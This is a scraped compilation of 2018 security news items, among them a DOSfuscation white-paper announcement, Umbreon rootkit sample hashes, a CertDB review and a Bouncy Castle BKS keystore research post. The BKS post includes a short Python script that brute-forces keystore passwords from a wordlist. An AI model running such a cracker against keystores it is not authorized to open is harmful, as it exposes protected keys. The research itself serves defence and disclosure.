Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.
However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.
In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.
As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.
Download the DOSfuscation white paper today.
Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.
Totally Overwhelmed – Business Security Weekly #78
This week, Michael and Paul interview Fred Scholl, President of Monarch Information Networks! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode78
Visit https://www.securityweekly.com/bsw for all the latest episodes!
I’m A Tiger – Enterprise Security Weekly #84
This week, John Strand takes the show by the reigns and conducts an outstanding interview with Brian Honan, who is recognised internationally as an expert on cybersecurity! John also gives a tech segment on how enterprises defend against attacks! All that and more, here on Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode84
Ninth Circuit Reverses District Court Decision in Zappos Consumer Data Breach Case
On March 8, 2018, the Ninth Circuit Court of Appeals (“Ninth Circuit”) reversed a decision from the United States District Court for the District of Nevada. The trial court found that one subclass of plaintiffs in In re Zappos.Com, Inc. Customer Data Security Breach Litigation, had not sufficiently alleged injury in fact to establish Article III standing. The opinion focused on consumers who did not allege that any fraudulent charges had been made using their identities, despite hackers accessing their names, account numbers, passwords, email addresses, billing and shipping addresses, telephone numbers, and credit and debit card information in a 2012 data breach.
As a threshold matter, this was the first occasion the Ninth Circuit had to find that its 2010 data breach standing precedent in Krottner v. Starbucks could be reconciled with the U.S. Supreme Court’s 2013 decision in Clapper v. Amnesty International. In Krottner, the Ninth Circuit found that the theft of a laptop containing consumers’ personally identifying information raised a “credible threat of real and immediate harm.” In Clapper, the U.S. Supreme Court held that the “objectively reasonable likelihood” that plaintiffs’ communications would be swept up in FISA surveillance did not rise to level of a “certainly impending injury” necessary to establish Article III standing.
The Ninth Circuit noted the series of inferences alleged by the Clapper plaintiffs, where none of their communications had yet been intercepted, much less under the specific statute that plaintiffs were challenging. In Krottner, however, the thief had acquired all of the information necessary to steal the plaintiffs’ identities once he or she accessed the stolen laptop. Similarly, in In re Zappos, the Ninth Circuit reasoned that plaintiffs had alleged that hackers had accessed enough data to enable the hackers to steal their identities.
The Ninth Circuit left open the possibility that plaintiffs might not be able to present sufficient evidence to support standing at summary judgment. But it joined a growing list of federal circuit courts finding that Article III standing in consumer data breach litigation can be “based on the hacking incident itself, not any subsequent illegal activity.”
AV18-049: Citrix Security Updates
WiTopia personalVPN review: It’s all about choices
WiTopia personalVPN in brief:
- P2P allowed: Yes
- Business location: Reston, VA
- Number of servers: 300+
- Number of country locations: 45
- Cost: $50 (Basic) / $70 (Pro)
- VPN protocol: OpenVPN (default)
- Data encryption: AES-128
- Data authentication: SHA2
- Handshake encryption: TLSv1.2
I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.
Never Tag Your Mom On Facebook If She Displays Her Maiden Name
Diving Into the Dark Web and Understanding the Economy Powering Cyber Attacks
This morning, Armor, a cloud security provider, released a great report into the cyber crime black market. Armor was formerly known as as FireHost – they were one of the leading hosts...
The post Diving Into the Dark Web and Understanding the Economy Powering Cyber Attacks appeared first on PerezBox.
Trump’s Connection To Cambridge Analytica
AV18-048: Mozilla Security Updates
Personal Information Of 880,000 Orbitz Customers Likely Breached
Supplementing the Limitations in Office 365
Type
Description
Office 365 is second to none in enterprise productivity and collaborative tools, but its security capabilities leave a lot to be desired. Osterman Research outlines how to improve Office 365 security.
Feature Link
Title
Richard Thomas Selected as Chair for Guernsey’s New Data Protection Authority
Hunton & Williams LLP is pleased to announce that Richard Thomas, Global Strategy Advisor to the Centre for Information Policy Leadership (“CIPL”), has been selected as Chair for the Bailiwick of Guernsey’s new data protection authority. Adding the appointment to his position at CIPL, Thomas will be formally appointed in May and will work with the Data Protection Commissioner and the States of Guernsey to support the island’s regulatory framework in conjunction with the introduction of its new data protection law. Thomas will work on a shadow basis until his formal appointment, and the role is expected to command between 10 and 15 days per year.
Guernsey previously received a finding of adequacy by the European Commission, permitting transfers between the island and the European Union. The new law seeks to update the data protection regime of the island in line with the EU General Data Protection Regulation and to maintain the determination of adequacy. Supporting this effort, Thomas will provide independent advice to the Guernsey Data Protection Commissioner and will chair a board overseeing the activities of the regulator.
Thomas served as UK Information Commissioner from 2002 to 2009. In January 2018, he was appointed to the UK Advisory Committee on Business Appointments and has received numerous awards for his contributions to the data privacy landscape, including “Privacy Leader of the Year” by the International Association of Privacy Professionals.
Rootkit Umbreon / Umreon – x86, ARM samples

Research: Trend Micro
There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)
# | File Name | Hash Value | File Size (on Disk) | Duplicate? |
---|---|---|---|---|
1 | .umbreon-ascii | 0B880E0F447CD5B6A8D295EFE40AFA37 | 6085 bytes (5.94 KiB) | |
2 | autoroot | 1C5FAEEC3D8C50FAC589CD0ADD0765C7 | 281 bytes (281 bytes) | |
3 | CHANGELOG | A1502129706BA19667F128B44D19DC3C | 11 bytes (11 bytes) | |
4 | cli.sh | C846143BDA087783B3DC6C244C2707DC | 5682 bytes (5.55 KiB) | |
5 | hideports | D41D8CD98F00B204E9800998ECF8427E | 0 bytes ( bytes) | Yes, of file promptlog |
6 | install.sh | 9DE30162E7A8F0279E19C2C30280FFF8 | 5634 bytes (5.5 KiB) | |
7 | Makefile | 0F5B1E70ADC867DD3A22CA62644007E5 | 797 bytes (797 bytes) | |
8 | portchecker | 006D162A0D0AA294C85214963A3D3145 | 113 bytes (113 bytes) | |
9 | promptlog | D41D8CD98F00B204E9800998ECF8427E | 0 bytes ( bytes) | |
10 | readlink.c | 42FC7D7E2F9147AB3C18B0C4316AD3D8 | 1357 bytes (1.33 KiB) | |
11 | ReadMe.txt | B7172B364BF5FB8B5C30FF528F6C5125 | 2244 bytes (2.19 KiB) | |
12 | setup | 694FFF4D2623CA7BB8270F5124493F37 | 332 bytes (332 bytes) | |
13 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) | Yes, of file spytty.sh |
14 | umbreon.c | 91706EF9717176DBB59A0F77FE95241C | 1007 bytes (1007 bytes) | |
15 | access.c | 7C0A86A27B322E63C3C29121788998B8 | 713 bytes (713 bytes) | |
16 | audit.c | A2B2812C80C93C9375BFB0D7BFCEFD5B | 1434 bytes (1.4 KiB) | |
17 | chown.c | FF9B679C7AB3F57CFBBB852A13A350B2 | 2870 bytes (2.8 KiB) | |
18 | config.h | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes) | |
19 | config.h.dist | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes) | Yes, of file config.h |
20 | dirs.c | 46B20CC7DA2BDB9ECE65E36A4F987ABC | 3639 bytes (3.55 KiB) | |
21 | dlsym.c | 796DA079CC7E4BD7F6293136604DC07B | 4088 bytes (3.99 KiB) | |
22 | exec.c | 1935ED453FB83A0A538224AFAAC71B21 | 4033 bytes (3.94 KiB) | |
23 | getpath.h | 588603EF387EB617668B00EAFDAEA393 | 183 bytes (183 bytes) | |
24 | getprocname.h | F5781A9E267ED849FD4D2F5F3DFB8077 | 805 bytes (805 bytes) | |
25 | includes.h | F4797AE4B2D5B3B252E0456020F58E59 | 629 bytes (629 bytes) | |
26 | kill.c | C4BD132FC2FFBC84EA5103ABE6DC023D | 555 bytes (555 bytes) | |
27 | links.c | 898D73E1AC14DE657316F084AADA58A0 | 2274 bytes (2.22 KiB) | |
28 | local-door.c | 76FC3E9E2758BAF48E1E9B442DB98BF8 | 501 bytes (501 bytes) | |
29 | lpcap.h | EA6822B23FE02041BE506ED1A182E5CB | 1690 bytes (1.65 KiB) | |
30 | maps.c | 9BCD90BEA8D9F9F6270CF2017F9974E2 | 1100 bytes (1.07 KiB) | |
31 | misc.h | 1F9FCC5D84633931CDD77B32DB1D50D0 | 2728 bytes (2.66 KiB) | |
32 | netstat.c | 00CF3F7E7EA92E7A954282021DD72DC4 | 1113 bytes (1.09 KiB) | |
33 | open.c | F7EE88A523AD2477FF8EC17C9DCD7C02 | 8594 bytes (8.39 KiB) | |
34 | pam.c | 7A947FDC0264947B2D293E1F4D69684A | 2010 bytes (1.96 KiB) | |
35 | pam_private.h | 2C60F925842CEB42FFD639E7C763C7B0 | 12480 bytes (12.19 KiB) | |
36 | pam_vprompt.c | 017FB0F736A0BC65431A25E1A9D393FE | 3826 bytes (3.74 KiB) | |
37 | passwd.c | A0D183BBE86D05E3782B5B24E2C96413 | 2364 bytes (2.31 KiB) | |
38 | pcap.c | FF911CA192B111BD0D9368AFACA03C46 | 1295 bytes (1.26 KiB) | |
39 | procstat.c | 7B14E97649CD767C256D4CD6E4F8D452 | 398 bytes (398 bytes) | |
40 | procstatus.c | 72ED74C03F4FAB0C1B801687BE200F06 | 3303 bytes (3.23 KiB) | |
41 | readwrite.c | C068ED372DEAF8E87D0133EAC0A274A8 | 2710 bytes (2.65 KiB) | |
42 | rename.c | C36BE9C01FEADE2EF4D5EA03BD2B3C05 | 535 bytes (535 bytes) | |
43 | setgid.c | 5C023259F2C244193BDA394E2C0B8313 | 667 bytes (667 bytes) | |
44 | sha256.h | 003D805D919B4EC621B800C6C239BAE0 | 545 bytes (545 bytes) | |
45 | socket.c | 348AEF06AFA259BFC4E943715DB5A00B | 579 bytes (579 bytes) | |
46 | stat.c | E510EE1F78BD349E02F47A7EB001B0E3 | 7627 bytes (7.45 KiB) | |
47 | syslog.c | 7CD3273E09A6C08451DD598A0F18B570 | 1497 bytes (1.46 KiB) | |
48 | umbreon.h | F76CAC6D564DEACFC6319FA167375BA5 | 4316 bytes (4.21 KiB) | |
49 | unhide-funcs.c | 1A9F62B04319DA84EF71A1B091434C64 | 4729 bytes (4.62 KiB) | |
50 | cryptpass.py | 2EA92D6EC59D85474ED7A91C8518E7EC | 192 bytes (192 bytes) | |
51 | environment.sh | 70F467FE218E128258D7356B7CE328F1 | 1086 bytes (1.06 KiB) | |
52 | espeon-connect.sh | A574C885C450FCA048E79AD6937FED2E | 247 bytes (247 bytes) | |
53 | espeon-shell | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB) | |
54 | espeon.c | 499FF5CF81C2624B0C3B0B7E9C6D980D | 14899 bytes (14.55 KiB) | |
55 | listen.sh | 69DA525AEA227BE9E4B8D59ACFF4D717 | 209 bytes (209 bytes) | |
56 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) | |
57 | ssh-hidden.sh | AE54F343FE974302F0D31776B72D0987 | 127 bytes (127 bytes) | |
58 | unfuck.c | 457B6E90C7FA42A7C46D464FBF1D68E2 | 384 bytes (384 bytes) | |
59 | unhide-self.py | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes) | |
60 | listen.sh | F5BD197F34E3D0BD8EA28B182CCE7270 | 233 bytes (233 bytes) |
part 2 (those listed in the Trend Micro article)
# | File Name | Hash Value | File Size (on Disk) |
---|---|---|---|
1 | 015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac | A47E38464754289C0F4A55ED7BB55648 | 9375 bytes (9.16 KiB) |
2 | 0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a | F9BA2429EAE5471ACDE820102C5B8159 | 7512 bytes (7.34 KiB) |
3 | 0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) |
4 | 0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes) |
5 | 122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670 | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB) |
6 | 409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a | B4746BB5E697F23A5842ABCAED36C914 | 6149 bytes (6 KiB) |
7 | 4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234 | D0D97899131C29B3EC9AE89A6D49A23E | 65160 bytes (63.63 KiB) |
8 | 8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784 | E7E82D29DFB1FC484ED277C702187818 | 55564 bytes (54.26 KiB) |
9 | 991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522 | 2B1863ACDC0068ED5D50590CF792DF05 | 7664 bytes (7.48 KiB) |
10 | a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf | A977F68C59040E40A822C384D1CEDEB6 | 176 bytes (176 bytes) |
11 | aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b | DF320ED7EE6CCF9F979AEFE451877FFC | 26 bytes (26 bytes) |
12 | acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525 | 84D552B5D22E40BDA23E6587B1BC532D | 6852 bytes (6.69 KiB) |
13 | c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480 | 087DD79515D37F7ADA78FF5793A42B7B | 11184 bytes (10.92 KiB) |
14 | e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853 | BBEB18C0C3E038747C78FCAB3E0444E3 | 71940 bytes (70.25 KiB) |
Is your VPN secure? How to check for leaks
A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?
To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for what is my IP on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That’s a good place to start, but there is more to your internet connection and its potential for leaks.
CertDB is a free SSL certificate search engine and analysis platform

How many times have you stumbled on the SSL certificate, and the only things that you cared about were Common Name (CN), DNS Names, Dates (issue and expiry)? Do you know SSL certificate can speak so much about you/ your firm? It can tell stories and motives; you can gather a good intelligence from them - which companies are hosting new domains, sub-domains; did they just revoke the last certificate? Or, why some firm switched its vendors/ CA(s)? We all have read that SSL certificates have always been the talk of the town for their inherent strength but weak issuance process, i.e. the chain of command relying on the Certificate Authorities, (aka the business firms) but haven't played with them in real-time. There are search engines available but none of them as comprehensive, fast and free as CertDB
There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even involved[3] directly. Even though the vast initiatives by browsers and firms to regularly monitor SSL certificates[4], improve browser behaviours for awareness[5] and revoke the bad ones has been highly appreciated, the pentesters often don't find much during the comprehensive assessment. Recently, there has been an uproar on the business interests of CA(s) with the issuance, so much so that some are being tagged as bad and untrusted CA[6] for not doing job well. Companies are moving aggressively to HTTPS especially with the recent introduction of LetsEncrypt Wildcard Certificates. But we haven't seen the use of all this information on a common platform to further analyse the certificates and assess their digital SSL footprint and gather valuable intelligence.
This is where CertDB steps in. A great project maintained by smart people and FREE forever[7] for the public. I spent last few weeks accessing their services, and the platform and my short verdict says - It is great! It does have some quirks, but highly recommended!
The crt.sh and CertDB serve different objectives. while crt.sh gets the data from certificate transparency (CT) logging system where "legit" CA submit the certs in "real time"; CertDB is based on the scanning the IPv4 segment, domains and "finding & analyzing" certificates - good or bad.
CertDB can also find self-signed certificates, which crt.sh can not. Hence, CertDB can give a realistic view of HTTPS - which IP is using what certs, self-signed, invalid CA etc; while crt.sh shows the "good" law-abiding view, per say.
What is CertDB?
CertDB is an Internet search engine for SSL certificates. In simple terms, it parses the certificate and then makes different fields indexable for the user to execute search queries. It indexes the following common information,
Fields | Details |
---|---|
Subject | Country, State, Category, Serial Number, Locality, Organization, Common Name |
Issuer | Country, State, Locality, Organization, Common Name |
Others | Public Key IP Address related to the domain, Validity Dates |
Fingerprint | SHA1, SHA256 and MD5 |
Extensions | Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies |
Now once you have extracted these fields, you can query and generate intelligence around it. You have these fields available with a logical query, and can be clubbed together to make complex queries. CertDB also provides raw certificates, public key and json formatted certificate information available for download. Recently they have integrated Alexa Ranking with the domains/ IP addresses and all of this information has been filtered and is available as lists - top domains, top organizations, top countries, top issuers etc.
One such exciting list is "expiring certificates" where you can find the list of Domains/ Organizations whose certificates are about to expire. This kind of information can be convenient while auditing or assessing the firm's digital footprint.
Real-time updates
While the documentation says the CertDB continuously scans every reachable web-server, on the Internet; the lab tests are not conclusive. I have asked the team to clarify and shall publish the response as part of the interview once I have a confirmed reply. But, it's appreciable that once their scanner detects the certificate, the information is available for the public to perform the required analysis in near real-time.
Use Cases
While we have all the information extracted from the digital certificates, we have to filter the results to get the required information via GUI or API. The GUI is open to all and can be used to do such queries with search-box, but to use the API one has to register an account.
You can register at https://certdb.com/signup, and an API key shall be allotted to you to perform 1000 queries a day with maximum 1000 results per query.
Field | Value |
---|---|
URL | https://certdb.net/api |
Method | GET, POST |
api_key | <get your key post registration> |
q | Any query (just like in search interface) |
response_type | 0 — JSON list of the dictionary with found certificates with all details 1 — JSON list of found certificates in base64 2 — JSON list of distinct organizations from found certificates 3 — JSON list of distinct domains from found certificates |
It takes 30 seconds to register and receive the API Key. Here are few examples of querying the right information,
- Search for Issuer "Godaddy" issued certificate for an "Italian region" domain/company.
issuer:"Godaddy.com" country:"Italy"
- Certificates issued to a subnet or IP range (example: Amazon Global IP Range: 13.32.0.0/15[8])
cidr:"13.32.0.0/15"
(example: replace,
with newline and only list first 10 resultstr , '\n' | head -10
- Expiring in next ten days.
expiring:"10 days"
- Expiring certificates in next seven days for Netflix organization
expiring:"7 days" organization:"Netflix"
- New Certificates in last five days for Safeway Insurance Company (via API)
new:"5 days" organization:"Safeway Insurance Company"
There can be many such cases where you would like to know the certificates issued to a firm in the past; or if the firm recently got a new domain/ sub-domain and looking for a new business line. I could think of the following interesting cases if I am doing an assessment,
- Dork all the subdomains;
site:example.com
and then start negating in a loop as per the first result.site:example.com -www
tosite:example.com -www -test
. Or, use a threat intel tool to gather the sub-domains and validate if they all have SSL certificates. Manually check, and report if some domains are not on HTTPS (Refer: Google will be hard on you if you are not on HTTPS!) - If you are technically assessing a company, do check their domains names and Organization.
q="organization:"Example Inc."
and you will be surprised to see sometimes firms are not aware of the domains on their name, or certificate issued by them but not renewed on time.
Quirks
While the service is great, there are few issues as well which the team is working on,
- The errors are not customized. If the API queries are wrong; it dumps a lot of debug data which must be removed.
- The API key cannot be re-generated or revoked. You may have to contact CertDB support to revoke it.
- The API Key can be used in a
GET
request. It is not recommended as it can be cached at many hops (example: proxy) - The documentation is not comprehensive, and probably more detailed information is needed when using API calls.
- The site doesn't provide an example of API interaction. In my opinion, CertDB should write a page with few examples using Python, CURL, Ruby, Perl and other common languages including
json
parsing of the results.
Conclusion
It's been few weeks since I am using this service, and my frank opinion is it has great potential and use. I am using this service while assessing AWS instances, and Fortune 500 firms. I have also found some expiring certificates for the clients and informed them in due course of time. I would highly recommend you to have a look and register an account. You can also set a cron job
to check the dates/ digital SSL footprint of an organization.
Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.
Cover Image Credit: Photo by Rubén Bagüés
Distrust of the Symantec PKI: Immediate action needed by site operators ↩︎
In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use. ↩︎
Amazon IP Range: https://ip-ranges.amazonaws.com/ip-ranges.json ↩︎
More Crypto, More Problems – Application Security Weekly #09
This week, Keith and Paul discuss Uber's open source tool for adversarial simulation, AMD processors, Hijacked MailChimp accounts used to distribute banking malware, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode09
Visit https://www.securityweekly.com/asw for all the latest episodes!
Three Hacking Groups You Definitely Need to Know About
Hacker groups began to flourish in the early 1980s with the emergence of computer. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. Hackers usually cover up their tracks by leaving false clues or by leaving absolutely no evidence behind. In the light of
The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Mysql create user
Creating a mysql user is a very common task and a very important one. Many developers after creating a user grant them all permissions over a mysql schema and this can be a big security flaw. When you are creating a user you must think of all permissions that user will need and grant them the
The post Mysql create user appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults
The enormous number of hacks in 2014 have propelled information safety into the front of the news and the brains of many companies. Cyber attacks on big enterprises like Target, Sony, and Home Depot lately caused President Obama to call for partnership amongst the two sectors (private and public) in order to share the information
The post Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?
Windows has the added facility to work as a VPN server, even though this choice is undisclosed. This can work on both versions of Windows – Windows 8 and Windows 7. To enable this, the server makes use of the point-to-point tunneling protocol (PPTP.) This could be valuable for linking to your home system on
The post Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software? appeared first on Hacker News Bulletin | Find the Latest Hackers News.
The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed
Pemera Blue Cross, a United States of America – based health insurance corporation, has confided in that its systems were infringed upon and their security and associability was breached when cyber criminals hacked the company and made their way in 11 million of their customers’ records. It is the second cyber attack in a row
The post The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Political analysts caution air plane connections systems that are susceptible to cyber attacks
Marketable and even martial planes have an Achilles heel that could abscond them as susceptible to cyber criminals on the ground, who specialists say could possibly seize cockpits and generate disorder in the skies. At the present, radical groups are thought to be short of the complexity to bring down a plane vaguely, but it
The post Political analysts caution air plane connections systems that are susceptible to cyber attacks appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Researcher makes $225,000, legally, by cyber attacking browsers
A single researcher who is actually a cyber criminal made $225,000 this week – that too all by legal means! This cyber research hacker cyber criminally attacked browsers this past week. For the past two days, safety researchers have tumbled down on Vancouver for a Google – sponsored competition called Pwn – 2 – Own,
The post Researcher makes $225,000, legally, by cyber attacking browsers appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer
Associates of two Chinese cyber crime teams have hollowed out the best prizes at a main yearly hacking competition held in Vancouver, Canada. Cyber attackers at Pwn2Own, commenced in 2007, were triumphant in violating the security of broadly -used software including Adobe Flash, Mozilla’s Firefox browser, Adobe PDF Reader and Microsoft’s freshly – discontinued Internet
The post Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Microsoft Remote Desktop Connection Manager
Imagine having the access and control to your computer to any place in the world from your iPhone. That would be really futuristic, no? Actually, this is not because there are applications available that can let you tap into your computer from on your mobile. These remote control applications do more than simply allow you
The post Microsoft Remote Desktop Connection Manager appeared first on Hacker News Bulletin | Find the Latest Hackers News.
Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’
The hack – tivist cyber criminal group Anonymous, more often than not related with cyber campaigns in opposition to fraudulent government administrations and terrorist organizations, has now set its sights on space. They posted a video on the group’s most important You Tube channel on the 18th of March, and called on to everyone through
The post Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’ appeared first on Hacker News Bulletin | Find the Latest Hackers News.
CIPL Welcomes Nathalie Laneret as New Director of Privacy Policy
The Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP is pleased to announce that Nathalie Laneret will be joining CIPL as Director of Privacy Policy in May. She brings more than 20 years of experience in data protection policy both in-house and in private practice. She is admitted to the New York and Paris bars and has experience in both France and in the U.S. on data protection, IT and security matters, contracts, competition law, compliance issues and litigation.
Nathalie joins CIPL from Capgemini Group, a leader in consulting, digital technology and outsourcing, where she was Public Affairs and Group Data Protection Officer, a member of the Group Cybersecurity and Information Protection Steering Committee, and responsible for managing the DPO network and defining Capgemini Group’s implementation strategy for the EU General Data Protection Regulation (“GDPR”). She sits on the IAPP European Advisory Board and is a member of the task force of the Cloud Infrastructure Service Providers in Europe Code of Conduct. In a statement, CIPL President Bojana Bellamy said, “I am delighted that with the addition of Nathalie, CIPL is increasing its presence in Europe and its ability to engage fully in both the ongoing data protection law reform in the EU and developing a strategy for the future.”
For more information about CIPL, visit their website.
The Curious Case of the Bouncy Castle BKS Passwords
While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!
In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.
Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and associated key is only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by a keystore itself, that same password will not be accepted to decrypt the private key contained within a keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.
Cracking BKS Files
As I investigated the first BKS file in my list, I quickly realized assumed that I could not determine what was contained in it unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS bruteforce cracker.
Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is actually not because the metadata of the keystore contents are protected. Because the metadata of the keystore contents are not encrypted, this information can be viewed without needing to use a valid password.
Using the pyjks library, I wrote a trivial script:
#!/usr/bin/env python3
import os
import sys
import jks
def trypw(bksfile, pw):
try:
keystore = jks.bks.BksKeyStore.load(bksfile, pw)
if keystore:
print('Password for %s found: "%s"' % (bksfile, pw))
sys.exit(0)
except jks.util.KeystoreSignatureException:
pass
except UnicodeDecodeError:
pass
with open(sys.argv[1]) as h:
pwlist = h.readlines()
for pw in pwlist:
trypw(sys.argv[2], pw.rstrip())
sys.exit(1)
Let's try this on the test BKS file that I have:
$ python crackbks.py strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.
The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.
Let's try this version of the brute-force cracking tool:
$ python crackbks.py strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: "query.is.any.user.logged.in"
Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:
First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.
The other thing that is happening is related to the BKS file format, which I discuss below.
Hashes and Collisions
When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock the resource. Consider the simple case where a collision-resistant hash function is used to verify the password: Is this password unique?
Applying a cryptographic hash function to the password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea
